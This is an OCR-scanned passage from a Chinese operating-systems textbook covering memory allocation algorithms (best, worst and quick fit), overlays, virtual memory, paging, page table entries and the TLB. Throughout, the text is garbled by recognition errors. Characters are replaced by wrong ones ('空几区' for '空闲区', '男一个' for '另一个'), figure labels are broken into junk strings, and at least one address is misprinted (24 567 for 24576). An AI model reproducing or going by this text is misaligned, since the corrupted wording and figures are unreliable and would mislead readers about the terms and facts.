另 一 个 著名 的 并 广泛 应 用 的 算法 是 最 佳 适 配 (best fit) 算法 。 最 佳 
适 配 算法 搜索 整个 链表 (从 开始 到 结束 ) ， 找 出 能 够 容纳 进程 的 最 小 
的 空 几 区 。 最 佳 适 配 算 法 试图 找 出 最 接近 实际 需要 的 空间 区 ， 以 最 好 
地 区 配 请 求 和 可 用 空 几 区， 而 不 古 先 拆 分 一 个 以 后 可 能 会 用 到 的 大 的 
ZS [AIK © 


以 图 3-6 为 例 来 考察 首次 适 配 算法 和 最 佳 适 配 算法 。 假 如 需要 一 个 
大 小 为 2 的 块 ， 首 次 适 配 算 法 将 分 配 在 位 置 5 的 空 几 区 ， 而 最 佳 适 配 算 
法 将 分 配 在 位 置 18 的 空 几 区 。 


因为 每 次 调用 最 佳 适 配 算 法 时 都 要 搜索 整个 链表 ， 所 以 它 要 比 下 
次 适 配 算法 慢 。 让 人 感到 有 点 意外 的 是 它 比 首次 适 配 算法 或 下 次 适 配 
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下 ， 首 次 适 配 算 法 生成 的 空 几 区 更 大 一 些 。 


最 佳 适 配 的 空闲 区 会 分 裂 出 很 多 非常 小 的 空 采 区 ， 为 了 避免 这 一 
问题 ， 可 以 考虑 最 差 适 配 (worst fit) 算法 ， 即 总 是 分 配 最 大 的 可 用 空 
闲 区 ， 使 新 的 空闲 区 比较 大 从 而 可 以 继续 使 用 。 仿 真 程序 表明 最 差 适 
配 算法 也 不 是 一 个 好 主意 。 


如 有 果 为 进程 和 空闲 区 维护 各 和 目 独立 的 链表 ， 那 么 这 四 个 算法 的 速 
度 都 能 得 到 提高 。 这 样 就 能 集中 精力 只 检查 空 亲 区 而 不 是 进程 。 但 这 
种 分 配 速度 的 提高 的 一 个 不 可 避免 的 代价 就 是 增加 复杂 度 和 内 存 释 放 
速度 变 慢 ， 因 为 必须 将 一 个 回收 的 段 从 进程 链表 中 删除 并 插入 空 几 区 
链表 。 


如 果 进 程 和 空 内 区 使 用 不 同 的 链表 ， 则 可 以 按照 大 小 对 空 几 区 链 
表 排 序 ， 以 便 提 高 最 佳 适 配 算法 的 速度 。 在 使 用 最 佳 适 配 算法 搜索 由 
小 到 大 排列 的 空 闪 区 链表 时 ， 只 要 找到 一 个 合适 的 空 几 区 ， 则 这 个 空 
内 区 就 古 能 容纳 这 个 作业 的 最 小 的 空 几 区 ， 因 此 是 最 佳 适 配 。 因 为 空 
内 区 链表 以 单 链表 形式 组 织 ， 所 以 不 需要 进一步 搜索 。 空 用 区 链表 按 
大 小 排序 时 ， 首 次 适 配 算法 与 最 佳 适 配 算 法 一 样 快 ， 而 下 次 适 配 算法 
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在 与 进程 段 分 离 的 单独 链表 中 保存 空 亲 区 时 ， 可 以 做 一 个 小 小 的 
优化 。 不 必 像 独 3-6c 那 样 用 单独 的 数据 结构 存放 空闲 区 链表 ， 而 可 以 利 
用 空 内 区 存储 这 些 信 息 。 每 个 空间 区 的 第 一 个 子 可 以 是 空 几 区 大 小 ， 

第 二 个 字 指 向 下 一 个 空 几 区 。 于 是 束 不 再 需要 图 3-6c 中 所 示 的 那些 三 个 
字 加 一 位 (P/H) 的 链表 结 点 了 。 


男 一 种 分 配 算法 称 为 快速 适 配 (quick fit) 算法 ， 它 为 那些 常用 大 
小 的 空 几 区 维护 单独 的 链表 。 例 如 ， 有 一 个 n 项 的 表 ， 该 表 的 第 一 项 是 
指 问 大 小 为 4KB 的 空 几 区 链表 表 尖 的 指针 ， 第 二 项 是 指向 大 小 为 8KB 的 
空 内 区 链表 表 尖 的 指 计 ， 第 三 项 是 指 疝 大 小 为 12KB 的 空 几 区 链表 表 头 
的 指针 ， 以 此 类 推 。 像 21KB 这 样 的 空 几 区 既 可 以 放 在 20KB 的 链表 中 ， 
也 可 以 放 在 一 个 专门 存放 大 小 比较 特别 的 空 亲 区 的 链表 中 。 


3.3 ”虚拟 内 存 


尽管 基 址 寄存 器 和 界限 寄存 器 可 以 用 于 创建 地 址 空间 的 抽象 ， 还 
有 男 一 个 问题 需要 解决 .管理 软件 的 膨胀 (bloatware) 。 虽 然 存储 器 
容量 增长 快速 ， 但 是 软件 大 小 的 增长 更 快 。 在 20 世 纪 80 年 代 ， 许 多 大 
学 用 一 台 4MB 的 VAX 计 算 机 运行 分 时 操作 的 系统 ， 供 十 几 个 用 户 (已 
经 或 多 或 少 足够 满足 需要 了 ) 同时 运行 。 现 在 微软 公司 为 单 用户 Vista 
系统 推荐 至 少 512MB 内 存 ， 并 且 只 能 运行 简单 的 应 用 程序 ， 如 采 运 行 
复杂 应 用 程序 则 要 1GB 内 存 。 而 多 媒体 的 测 流 则 进一步 推动 了 对 内 存 
的 需求 。 


这 一 发 展 的 结果 是 ， 需 要 运行 的 程序 往往 大 到 内 存 无 法 容纳 ， 而 
且 必 然 需要 系统 能 够 文 持 多 个 程序 同时 运行 ， 即 使 内 存 可 以 满足 其 中 
单独 一 个 程序 的 需要 ， 但 总 体 来 看 ， 它 们 仍然 超出 了 内 存 大 小 。 交 换 
技术 (swapping) 并 不 是 一 个 有 吸引 力 的 解决 方案 ， 因 为 一 个 典型 的 
SATA 磁 副 的 峰值 传输 率 最 高 达到 100MB/s， 这 意味 着 至 少 需要 10 秒 
能 换 出 一 个 1GB 的 程序 ， 并 需要 另 一 个 10 秒 才能 再 将 一 个 1GB 的 程序 换 
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程序 大 于 内 存 的 问题 早 在 计算 时 代 开 始 束 产生 了 ， 虽 然 只 是 有 限 
的 应 用 领域 ， 像 科学 和 工程 计算 (模拟 宇宙 的 创建 或 模拟 新 型 航空 器 
都 会 花费 大 量 内 存 ) 。 在 20 世 纪 60 年 代 所 采取 的 解决 方法 是 : 把 程序 


分 割 成 许多 片段 ， 称 为 覆盖 (overlay) 。 程 序 开始 执行 时 ， 将 履 盖 管 
理 模块 装 入 内 存 ， 该 管理 模块 立即 狼 入 并 运行 禾 盖 0。 执 行 完 成 后 ， 徐 
次 0 通 知 管理 模块 闭 入 覆盖 1， 或 者 占用 履 盖 0 的 上 方位 置 (如 果 有 空 
间 ) , Aa GAO (如 果 没 有 空间 ) 。 一 些 履 盖 系 统 非 常 复杂 ， 人 允 
许多 个 覆盖 块 同时 在 内 存 中 。 禾 盖 块 存放 在 磁盘 上 ， 在 需要 时 由 操作 
系统 动态 地 换 入 换 出 。 


虽然 由 系统 完成 实际 的 覆盖 块 换 入 换 出 操作 ， 但 是 程序 员 必 须 把 
程序 分 割 成 多 个 片段 。 把 一 个 大 程序 分 割 成 小 的 、 模 块 化 的 片段 是 非 
贡 费 时 和 桔 燥 的 ， 并 且 易 于 出 错 。 很 少 程序 员 擅 长 使 用 歼 盖 技术 。 因 
此 ， 没 过 多 和 久 束 有 人 找到 一 个 办 法 ， 把 全 部 工作 都 交 给 计算 机 去 做 。 


采用 的 这 个 方法 (Fotheringham, 1961) 称 为 虚拟 内 存 (virtual 
memory) ° 虚拟 内 存 的 基本 思想 是 : 每 个 程序 拥有 自己 的 地 址 空间 ， 
这 个 空间 被 分 割 成 多 个 块 ， 每 一 块 称 作 一 页 或 页 面 (page) 。 每 一 页 
有 连续 的 地 址 范围 。 这 些 页 被 映射 到 物理 内 存 ， 但 并 不 是 所 有 的 页 都 
必须 在 内 存 中 才能 运行 程序 。 当 程序 引用 到 一 部 分 在 物理 内 存 中 的 地 
址 空间 时 ， 由 硬件 立刻 执行 必要 的 映射 。 当 程序 引用 到 一 部 分 不 在 物 
理 内 存 中 的 地 址 空间 时 ， 由 操作 系统 负责 将 缺失 的 部 分 装 入 物理 内 存 
并 重新 执行 失败 的 指令 。 


从 某 个 角度 来 讲 ， 虚 拟 内 存 是 对 基 址 寄存 右 和 界限 寄存 器 的 一 种 
综合 。8088 为 正文 和 数据 分 离 出 专门 的 基 址 寄存 器 〈 但 不 包括 界限 寄 


存 器 ) 。 而 虚拟 内 存 使 得 整个 地 址 空间 可 以 用 相对 较 小 的 单元 映射 到 
物理 内 存 ， 而 不 是 为 正文 段 和 数据 段 分 别 进行 重 定位 。 下 面 会 介绍 虚 
拟 内 存 是 如 何 实现 的 。 


虚拟 内 存 很 适合 在 多 道 程序 设计 系统 中 使 用 ， 许 多 程序 的 片段 同 
时 保存 在 内 存 中 。 当 一 个 程序 等 待 它 的 一 部 分 读 入 内 存 时 ， 可 以 把 
CPU 交 给 男 一 个 进程 使 用 。 


3.3.1 4h 
大 部 分 虚拟 内 存 系统 中 都 使 用 一 种 称 为 分 页 (paging) 的 技术 ,我 


们 现在 就 介绍 这 一 技术 。 在 任何 一 台 计 算 机 上 ， 程 序 引 用 了 一 组 内 存 
地 址 。 当 程序 执行 指令 


MOV REG,1000 


时 ， 它 把 地 址 为 1000 的 内 存单 元 的 内 容 复 制 到 REG 中 (或 者 相 
反 ， 这 取决 于 计算 机 的 型 号 ) 。 地 址 可 以 通过 索引 、 基 址 寄存 器 、 段 
寄存 天 或 其 他 方式 产生 。 


由 程序 产生 的 这 些 地 址 称 为 虚拟 地 址 (virtual address) ， 它 们 构成 
了 一 个 虚拟 地 址 空间 (virtual address space) 。 在 没有 虚拟 内 存 的 计算 
机 上 ， 系 统 直接 将 虚拟 地 址 送 到 内 存 总 线 上 ， 读 写 操作 使 用 具有 同样 


地 址 的 物理 内 存 字 ， 而 在 使 用 虚拟 内 存 的 情况 下 ， 虚 拟 地 址 不 是 被 直 
接送 到 内 存 总 线 上 ， 而 是 被 送 到 内 存 管 理 单元 (Memory Management 
Unit, MMU) ，MMU 把 虚拟 地 址 映射 为 物理 内 存 地 址 ， 如 图 3-8 所 
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CPU 发 送 虚 拟 地 址 给 MMU 
CPU 包 


存 管 理 AS py. BR (ee Fi 
内 存 管 理 存储 器 


MMU 发 送 物理 地 址 
给 存储 器 
图 3-8 MMU 的 位 置 和 功能 。 这 里 MMU 作 为 CPU 芯片 的 一 部 分 ， 因 
为 通常 就 是 这 样 做 的 。 不 过 从 逻辑 上 看 ， 它 可 以 是 一 片 单独 的 芯片 ， 
并 且 早 就 已 经 这 样 了 


图 3-9 中 一 个 简单 的 例子 说 明了 这 种 映射 是 如 何 工作 的 。 在 这 个 例 
子 中 ， 有 一 台 可 以 产生 16 位 地 址 的 计算 机 ， 地 址 范围 从 0 到 64K， 且 这 
些 地 址 是 虚拟 地 址 。 然 而 ， 这 人 台 计 算 机 只 有 32KB 的 物理 内 存 ， 因 此 ， 
虽然 可 以 编写 64KB 的 程序 ， 但 它们 却 不 能 被 完全 调 入 内 存 运 行 。 在 磁 


盘 上 必须 有 一 个 可 以 大 到 64KB 的 程序 核心 映像 的 完整 副本 ， 以 保证 程 
序 片 段 在 需要 时 能 被 调 入 内 存 。 


虚拟 地 
址 空间 
60K ~64K 
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图 3-9 ”页 表 给 出 虚拟 地 址 与 物理 内 存 地 址 之 间 的 映射 关系 。 每 一 页 
起 始 于 4096 的 倍数 位 置 ， 结 束 于 起 址 加 4095， 所 以 4K 到 8K 实 际 为 4096 
~8191; 8K 到 12K 就 是 8192 一 12287 


虚拟 地 址 空间 按照 固定 大 小 划分 成 称 为 页 面 (page) 的 若干 单 
元 。 在 物理 内 存 中 对 应 的 单元 称 为 页 框 (page frame) 。 页 面 和 页 框 的 
大 小 通常 是 一 样 的 ， 在 本 例 中 是 4KB， 现 有 的 系统 中 常用 的 页 大 小 一 
般 从 512 字 节 到 64KB。 对 应 于 64KB 的 虚拟 地 址 空间 和 32KB 的 物理 内 
存 ， 我 们 得 到 16 个 虚拟 页 面 和 8 个 页 框 。RAM 和 磁 副 之 间 的 交换 总 是 以 
整个 页 面 为 单元 进行 的 。 


图 3-9 中 的 标记 符号 如 下 : 标记 OK~-4K 的 范围 表示 该 页 的 虚拟 地 址 
或 物理 地 址 是 0~4095。4K~8K 的 范围 表示 地 址 4096~8191， 等 等 。 
每 一 页 包含 了 4096 个 地 址 ， 起 始 于 4096 的 整数 倍 位置 ， 结 束 于 4096 倍 
数 缺 1。 


当 程 序 试图 访问 地 址 0 时 ， 例 如 执行 下 面 这 条 指令 


MOV REG,0 


将 虚拟 地 址 0 送 到 MMU“。MMU 看 到 虚拟 地 址 落 在 页 面 0 (0 一 
4095) ， 根 据 其 映射 结果 ， 这 一 页 面 对 应 的 是 页 框 2 《8192 一 12 
287) ， 因 此 MMU 把 地 址 变换 为 8192， 并 把 地 址 8192 送 到 总 线 上 。 内 
存 对 MMU 一 无 所 知 ， 它 只 看 到 一 个 读 或 写 地 址 8192 的 请 求 并 执行 它 。 
MMU 从 而 有 效 地 把 所 有 从 0~~4095 的 虚拟 地 址 映射 到 了 8192~12 287 的 
物理 地 址 。 


同样 地 ， 指 令 


MOV REG, 8192 


被 有 效 地 转换 为 : 


MOV REG, 24576 


因为 虚拟 地 址 8192 (在 虚拟 页 面 2 中 ) 被 映射 到 物理 地 址 24 567 
(在 物理 页 框 6 中 ) 上 。 第 三 个 例子 ， 虚 拟 地 址 20 500 在 距 虚 拟 页 面 5 
(虚拟 地 址 20 480~24 575) 起 始 地 址 20 字 节 处 ， 并 且 被 映射 到 物理 地 
址 12 288+20=12 308 ° 


通过 恰当 地 设置 MMU， 可 以 把 16 个 虚拟 页 面 映 射 到 8 个 页 框 中 的 
任何 一 个 。 但 是 这 并 没有 人 解决 虚拟 地 址 空间 比 物理 内 存 大 的 问题 。 在 
图 3-9 中 只 有 8 个 物理 页 框 ， 于 是 只 有 8 个 虚拟 页 面 被 映射 到 了 物理 内 存 
中 ， 在 图 3-9 中 用 义 号 表示 的 其 他 页 并 没有 说 映 喘 。 在 实际 的 人 硬件 中 ， 
用 一 个 “在 /不 在 ”位 (present/absent bit) 记录 页 面 在 内 存 中 的 实际 存在 
情况 。 


当 程 序 访 问 了 一 个 未 映射 的 页 面 ， 例 如 执行 指令 


MOV REG, 32780 


将 会 发 生 什么 情况 呢 ? 虚拟 页 面 8 (从 32 7687698) 的 第 12 个 字 节 
所 对 应 的 物理 地 址 是 什么 呢 ? MMU 注 意 到 该 页 面 没 有 被 映射 〈 在 图 中 


用 又 号 表示 ) ， 于 是 使 CPU 陷入 到 操作 系统 ， 这 个 陷阱 称 为 缺 页 中 断 

(page fault) 。 操 作 系统 找到 一 个 很 少 使 用 的 页 框 且 把 它 的 内 容 写 入 
HA (如 果 它 不 在 磁 副 上 ) 。 随 后 把 需要 访问 的 页 面 读 到 刚才 回收 的 
页 框 中 ， 修 改 映 里 关系， 然后 重新 局 动 引 起 隐 阱 的 指令 。 


例如 ， 如 果 操 作 系 统 决 定 放 弃 页 框 1， 那 么 它 将 把 虚拟 页 面 8 装 入 
物理 地 址 8192， 并 对 MMU 了 映射 做 两 处 修改 。 首 移 ， 它 要 标记 虚拟 页 面 
1 表 项 为 未 映射 ， 使 以 后 任何 对 虚拟 地 址 4096~8191 的 访问 都 导致 陷 
阱 。 随 后 把 虚拟 页 面 8 的 表 项 的 又 号 改 为 1， 因 此 在 引起 陷阱 的 指令 重 
新 启动 时 ， 它 将 把 虚拟 地 址 32780 映 射 为 物理 地 址 4108 (4096+12) 。 


下 面 查看 一 MU 的 内 部 结构 以 便 了 解 它 是 怎么 工作 的 ， 以 及 了 
解 为 什么 我 们 选用 的 页 面 大 小 都 是 2 的 整数 次 居 。 在 图 3-10 中 可 以 看 到 
一 个 虚拟 地 址 的 例子 ， 虚 拟 地址 8196 (二 进 制 是 0010000000000100) 
用 图 3-9 所 示 的 MMU 映 里 机 制 进行 映 冉 ,输入 的 16 位 虚拟 地 址 被 分 为 4 
位 的 页 号 和 12 位 的 偏 移 量 。4 位 的 页 号 可 以 表示 16 个 页 面 ，12 位 的 偏 移 
可 以 为 一 页 内 的 全 部 4096 个 字 节 编 址 。 
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图 3-10 在 16 个 4KB 页 面 情况 下 MMU 的 内 部 操作 


可 用 页 号 作为 页 表 (page table) 的 索引 ， 以 得 出 对 应 于 该 虚拟 页 
面 的 页 框 号 。 如果 “在 /不 在 ”位 是 0， 则 将 引起 一 个 操作 系统 陷阱 。 如 果 
该 位 是 1， 则 将 在 页 表 中 查 到 的 页 框 号 复制 到 输出 寄存 需 的 高 3 位 中 ， 
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3.3.2 Tie 


作为 一 种 最 简单 的 实现 ， 虚 拟 地 址 到 物理 地 址 的 映射 可 以 概括 如 
下 : 虚拟 地 址 被 分 成 虚拟 页 号 (高 位 部 分 和 偏 移 量 〈 低 位 部 分 ) 两 
部 分 。 例 如 ， 对 于 16 位 地 址 和 4KB 的 页 面 大 小 ， 高 4 位 可 以 指定 16 个 虚 
拟 页 面 中 的 一 页 ， 而 低 12 位 接着 确定 了 所 选 页 面 中 的 字 节 偏 移 量 (O~ 
4095) 。 但 是 使 用 3 或 者 5 或 者 其 他 位 数 拆 分 虚拟 地 址 也 是 可 行 的 。 不 
同 的 划分 对 应 不 同 的 页 面 大 小 。 


虚拟 页 号 可 用 做 页 表 的 索引 ， 以 找到 该 虚拟 页 面 对 应 的 页 表 项 。 
由 页 表 项 可 以 找到 页 框 号 (如 果 有 的 话 ) 。 然 后 把 页 框 号 拼接 到 偏 移 
量 的 高 位 端 ， 以 礁 换 挥 虚拟 页 和 号， 形成 送 往 内 存 的 物理 地 址 。 


页 表 的 目的 是 把 虚拟 页 面 映 冉 为 页 框 。 从 数学 角度 说 ， 页 表 是 一 
个 函数 ， 它 的 参数 是 虚拟 页 号 ， 结 果 是 物理 页 框 号 。 通 过 这 个 函数 可 
以 把 虚拟 地 址 中 的 虚拟 页 面 域 蔡 换 成 页 框 域 ， 从 而 形成 物理 地 址 。 


页 表 项 的 结构 


下 面 将 讨论 单个 页 表 项 的 细节 。 页 表 项 的 结构 是 与 机 融 密 切 相关 
的 ， 但 不 同 机 絮 的 页 表 项 存储 的 信息 都 大 致 相同 。 图 3-11 中 给 出 了 页 
表 项 的 一 个 例子 。 不 同 计算 机 的 页 表 项 大 小 可 能 不 一 样 ， 但 32 位 是 一 
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值 ， 其 次 是 “在 /不 在 ”位 ， 这 一 位 是 1 时 表示 该 表 项 是 有 效 的 ， 可 以 使 
用 ; 如 果 是 0， 则 表示 该 表 项 对 应 的 虚拟 页 面 现在 不 在 内 存 中 ， 访 问 该 
页 面 会 引起 一 个 缺 页 中 断 。 


高 速 缓存 
禁止 位 ”修改 位 “在 /不 在 ”位 


/ / 
i 


访问 位 ”保护 位 
图 3-11 一 个 典型 的 页 表 项 


“保护 ” (protection) 位 指出 一 个 页 允许 什么 类 型 的 访问 。 最 简单 
的 形式 是 这 个 域 只 有 一 位 ，0 表 示 读 / 写 ，1 表 示 只 读 。 一 个 更 先进 的 方 
法 是 使 用 三 位 ， 各 位 分 别 对 应 古 否 启用 读 、 写 、 执 行 该 页 面 。 


为 了 记录 页 面 的 使 用 状况 ， 引 入 了 “修改 ”(modified) 位 和 “ 访 
问 ” (referenced) 位 。 在 写 入 一 页 时 由 硬件 自动 设置 修改 位 。 该 位 在 
操作 系统 重新 分 配 页 框 时 是 非常 有 用 的 。 如 有 果 一 个 页 面 已 经 被 修改 过 
( 即 它 是 “ 脏 ? 的 ) ， 则 必须 把 它 写 回 磁盘 。 如 果 一 个 页 面 没 有 被 修改 
过 〈 即 它 是 干净” 的) ， 则 只 简单 地 把 它 丢 弃 就 可 以 了 ， 因 为 它 在 磁 


盘 上 的 副本 仍然 是 有 效 的 。 这 一 位 有 时 也 被 称 为 脏 位 (dirty bit) ， 因 
为 它 反 映 了 该 页 面 的 状态 。 


不 论 是 读 还 是 写 ， 系 统 都 会 在 该 页 面 被 访问 时 设置 访问 位 。 它 的 
值 被 用 来 帮助 操作 系统 在 发 生 缺 页 中 断 时 选择 要 被 淘汰 的 页 面 。 不 再 
使 用 的 页 面 要 比 正在 使 用 的 页 面 更 适合 淘汰 。 这 一 位 在 即将 讨论 的 很 
多 页 面 置换 算法 中 都 会 起 到 重要 的 作用 。 


最 后 一 位 用 于 禁止 该 页 面 被 高 速 缓存 。 对 那些 映射 到 设备 寄存 器 
而 不 是 常规 内 存 的 页 面 而 言 ， 这 个 特性 是 非常 重要 的 。 假 如 操作 系统 
正在 紧张 地 循环 等 待 革 个 IO 设备 对 它 刚 发 出 的 命令 作出 响应 ， 保 证 硬 
件 是 不 断 地 从 设备 中 读 取 数据 而 不 是 访问 一 个 旧 的 被 高 速 缓存 的 副本 
是 非常 重要 的 。 通 过 这 一 位 可 以 禁止 高 速 缓存 。 具 有 独立 的 IO 空间 而 
不 使 用 内 存 映射 VO 的 机 器 不 需要 这 一 位 。 


应 该 注意 的 是 ， 葫 某 个 页 面 不 在 内 存 时 ， 用 于 保存 该 页 面 的 人 磁 副 
地 址 不 是 页 表 的 一 部 分 。 原 因 很 简单 ， 页 表 只 保存 把 虚拟 地 址 转换 为 
物理 地 址 时 硬件 所 需要 的 信息 。 操 作 系 统 在 处 理 缺 页 中 断 时 需要 把 该 
页 面 的 磁盘 地 址 等 信息 保存 在 操作 系统 内 部 的 软件 表格 中 。 人 硬件 不 需 
Bee 


在 深入 到 更 多 应 用 实现 问题 之 前 ， 值 得 再 次 强调 的 是 :， 虚拟 内 存 
本 质 上 十 用 来 创造 一 个 新 的 抽象 概念 空间 ， 这 个 概念 是 对 物 


理 内 存 的 抽象 ， 类 似 于 进程 是 对 物理 机 器 (CPU) 的 抽象 。 虚 拟 内 存 
的 实现 ， 是 将 虚拟 地 址 空间 分 解 成 页 ， 并 将 每 一 页 映 喘 到 物理 内 存 的 
某 个 页 框 或 者 (暂时 ) 解除 映射 。 因 此 ， 本 章 的 基本 内 容 即 关 于 操作 
系统 创建 的 抽象 ， 以 及 如 何 管 理 这 个 抽象 。 


3.3.3 “加速 分 页 过 程 


我 们 已 经 了 解 了 虚拟 内 存 和 分 页 的 基础 。 现 在 是 时 候 深 入 到 更 多 
关于 可 能 的 实现 的 细节 中 去 了 。 在 任何 分 页 式 系统 中 ， 都 需要 考虑 两 
个 主要 问题 : 


1) 庶 拟 地 址 到 物理 地 址 的 映射 必须 非常 快 。 
2) 如 采 虚 拟 地 址 空间 很 大 ， 页 表 也 会 很 大 。 


第 一 个 问题 是 由 于 每 次 访问 内 存 ， 都 需要 进行 虚拟 地 址 到 物理 地 
址 的 映射 。 所 有 的 指令 最 终 都 必须 来 目 内存 ， 并 且 很 多 指令 也 会 访问 
内 存 中 的 操作 数 。 因 此 ， 每 条 指令 进行 一 两 次 或 更 多 页 表 访 问 是 必要 
的 。 如 果 执 行 一 条 指令 需要 lns， 页 表 碍 询 必 须 在 0.2ns 之 内 完成 ， 以 避 
ERAT MAT ESM o 


第 二 个 问题 来 目 现代 计算 机 使 用 至 少 32 位 的 虚拟 地 址 ， 而 且 64 位 
变 得 越 来 越 普遍 。 假 设 页 长 为 4KB，32 位 的 地 址 空间 将 有 100 万 页 ， 而 
64 位 地 址 空间 简直 多 到 超 乎 你 的 想象 。 如 采 虚 拟 地 址 空间 中 有 100 万 个 
页 ， 那 么 页 表 必 然 有 100 万 条 表 项 。 另 外 请 记 住 ， 每 个 进程 都 需要 目 己 
的 页 表 (因为 它 有 自己 的 虚拟 地 址 空间 ) 。 


对 大 而 快速 的 页 映 冉 的 需求 成 为 了 构建 计算 机 的 重要 约束 。 最 简 
单 的 设计 (至 少 从 概念 上 ) 古 使 用 由 一 组 “快速 硬件 寄存 器 ”组 成 的 单 
一 页 表 ， 每 一 个 表 项 对 应 一 个 虚 页 ， 虚 页 号 作为 索引 ， 如 图 3-10 所 
示 。 当 启动 一 个 进程 时 ， 操 作 系 统 把 保存 在 内 存 中 的 进程 页 表 的 副本 
载 入 到 寄存 器 中 。 在 进程 运行 过 程 中 ， 不 必 再 为 页 表 而 访问 内 存 。 这 
个 方法 的 优势 是 侧 单 并 且 在 映射 过 程 中 不 需要 访问 内 存 。 而 缺点 是 在 
ARRAN, Riam e 而且 每 一 次 上 下 文 切 换 都 必须 朔 载 整个 页 
表 ， 这 样 会 降低 性 能 。 


另 一 种 极端 方法 是 ， 人 整个 页 表 都 在 内 存 中 。 那 时 所 需 的 硬件 仅仅 
古 一 个 指向 页 表 起 始 位 置 的 寄存 器。 这 样 的 设计 使 得 在 上 下 文 切换 
时 ， 进 行 “虚拟 地 址 到 物理 地 址 ”的 映射 只 需 重新 狐 入 一 个 寄存 右 。 当 
然 ， 这 种 做 法 的 缺陷 是 在 执行 每 条 指令 时 ， 都 需要 一 次 或 多 次 内 存 访 
问 ， 以 完成 页 表 项 的 读 入 ， 速 度 非 常 慢 。 


1. 转 换 检测 缓冲 区 


现在 讨论 加 速 分 页 机 制 和 处 理 大 的 虚拟 地 址 空间 的 实现 方案 ， 移 
介绍 加 速 分 页 问题 。 大 多 数 优 化 技术 都 是 从 内 存 中 的 页 表 开 始 的 。 这 
种 设计 对 效率 有 着 巨 大 的 影响 。 例 如 ， 假 设 一 条 指令 要 把 一 个 寄存 天 
中 的 数据 复制 到 为 一 个 寄存 器 。 在 不 分 页 的 情况 下 ， 这 条 指令 只 访问 
一 次 内 存 ， 即 从 内 存 中 取 指 令 。 有 了 分 页 后 ， 则 因为 要 访问 页 表 而 引 
起 更 多 次 的 访问 内 存 。 由 于 执行 速度 通常 被 CPU 从 内 存 中 取 指 令 和 数 


据 的 速度 所 限制 ， 所 以 每 次 内 存 访问 必须 进行 两 次 页 表 访 问 会 降低 一 
半 的 性 能 。 在 这 种 情况 下 ， 没 人 会 采用 分 页 机 制 。 


多 年 以 来 ， 计 算 机 的 设计 者 已 经 意识 到 了 这 个 问题 ， 并 找到 了 一 
种 解决 方案 。 这 种 解决 方案 的 建立 基于 这 样 一 种 现象 : 大 多 数 程序 总 
征 对 少量 的 页 面 进行 多 次 的 访问 ， 而 不 是 相反 的 。 因 此 ， 只 有 很 少 的 
页 表 项 会 补 反 复读 取 ， 而 其 他 的 页 表 项 很 少 被 访问 。 


上 面 提 到 的 解决 方案 是 为 计算 机 设置 一 个 小 型 的 硬件 设备 ， 将 虚 
拟 地 址 直接 映射 到 物理 地 址 ， 而 不 必 再 访问 页 表 。 这 种 设备 称 为 转换 
仿 测 缓冲 区 (Translation Lookaside Buffer, TLB) ， 有 时 又 称 为 相 联 
存储 器 (associate memory) ， 如 图 3-12 所 示 。 它 通常 在 MMU 中 ， 包 含 
少量 的 表 项 ， 在 此 例 中 为 8 个 ， 在 实际 中 很 少 会 超过 64 个 。 每 个 表 项 记 
录 了 一 个 页 面 的 相关 信息 ， 包 括 虚 拟 页 号 、 页 面 的 修改 位 、 保 扩 码 
( 读 / 写 /执行 权限 ) 和 该 页 所 对 应 的 物理 页 框 。 除 了 虚拟 页 号 (不 是 
必须 放 在 页 表 中 的 ) ， 这 些 域 与 页 表 中 的 域 是 一 一 对 应 的 。 另 外 还 有 
一 位 用 来 记录 这 个 表 项 是 否 有 效 〈 即 是 否 在 使 用 ) ° 


如 果 一 个 进程 在 虚拟 地 址 19、20 和 21 之 间 有 一 个 循环 ， 那 么 可 能 
会 生成 图 3-12 中 的 TLB。 因 此 ， 这 三 个 表 项 中 有 可 读 和 可 执行 的 保护 
码 。 当 前 主要 使 用 的 数据 (假设 是 个 数组 ， 放 在 页 面 129 和 页 面 130 
中 。 页 面 140 包 含 了 用 于 数组 计算 的 索引 。 最 后 ， 堆 栈 位 于 页 面 860 和 
页 面 861。 
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有 效 位 ”虚拟 页 面 号 


保护 位 | ”页 框 号 
| 31 
38 | 
29 | 
62 
ce 50 
45 
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现在 看 一 下 TLB 是 如 何 工作 的 。 将 一 个 虚拟 地 址 放 入 MMU 中 进行 
转换 时 ， 硬 件 首先 通过 将 该 虚拟 页 号 与 TLB 中 所 有 表 项 同时 〈 即 并 
行 ) 进行 匹配 ， 判 断 虚拟 页 面 是 否 在 其 中 。 如 果 发 现 了 一 个 有 效 的 匹 
配 并 且 要 进行 的 访问 操作 并 不 违反 保护 位 ， 则 将 页 框 号 直接 从 TLB 中 
取出 而 不 必 再 访问 页 表 。 如 果 虚 拟 页 面 号 确实 是 在 TLB 中 ， 但 指令 试 
图 在 一 个 只 读 页 面 上 进行 写 操作 ， 则 会 产生 一 个 保护 错误 ， 就 像 对 页 
表 进 行 非法 访问 一 样 。 


当 虚 拟 页 号 不 在 TLB 中 时 发 生 的 事情 值得 讨论 。 如 果 MMU 检 测 到 
没有 有 效 的 匹配 项 时 ， 就 会 进行 正常 的 页 表 查 询 。 接 着 从 TLB 中 淘汰 
一 个 表 项 ， 然 后 用 新 找到 的 页 表 项 代 奉 它 。 这 样 ， 如 采 这 一 页 面 很 快 
再 被 访 问 ， 第 二 次 访问 TLB 时 目 然 将 会 命中 而 不 古 不 命中 。 当 一 个 表 


项 被 清除 出 TLB 时 ， 将 修改 位 复制 到 内 存 中 的 页 表 项 ， 而 除了 访问 
位 ， 其 他 的 值 不 变 。 当 页 表 项 中 从 页 表 闭 入 到 TLB 中 时 ， 所 有 的 值 都 
来 目 内 存 。 


2. 软 件 TLB 管 理 


到 目前 为 止 ， 我 们 已 经 假设 每 一 台 具 有 虚拟 内 存 的 机 器 都 具有 由 
硬件 识别 的 页 表 ， 以 及 一 个 TLB。 在 这 种 设计 中 ， 对 TLB 的 管理 和 
TLB 的 失效 处 理 都 完全 由 MMU 硬 件 来 实现 。 只 有 在 内 存 中 没有 找到 某 
个 页 面 时 ， 才 会 陷入 到 操作 系统 


在 过 去 ， 这 样 的 假设 是 正确 的 。 但 是 ， 许 多 现代 的 RISC 机 器 ， 包 
括 SPARC、MIPS 以 及 HP PA， 几 乎 所 有 的 页 面 管理 都 是 在 软件 中 实现 
的 。 在 这 些 机 器 上 ，TLB 表 项 被 操作 系统 显 式 地 装载 。 当 发 生 TLB 访 
问 失 效 ， 不 再 是 由 MMU 到 页 表 中 查找 并 取出 需要 的 页 表 项 ， 而 是 生成 
一 个 TLB 失 效 并 将 问题 交 给 操作 系统 解决 。 系 统 必须 先 找到 该 页 面 ， 
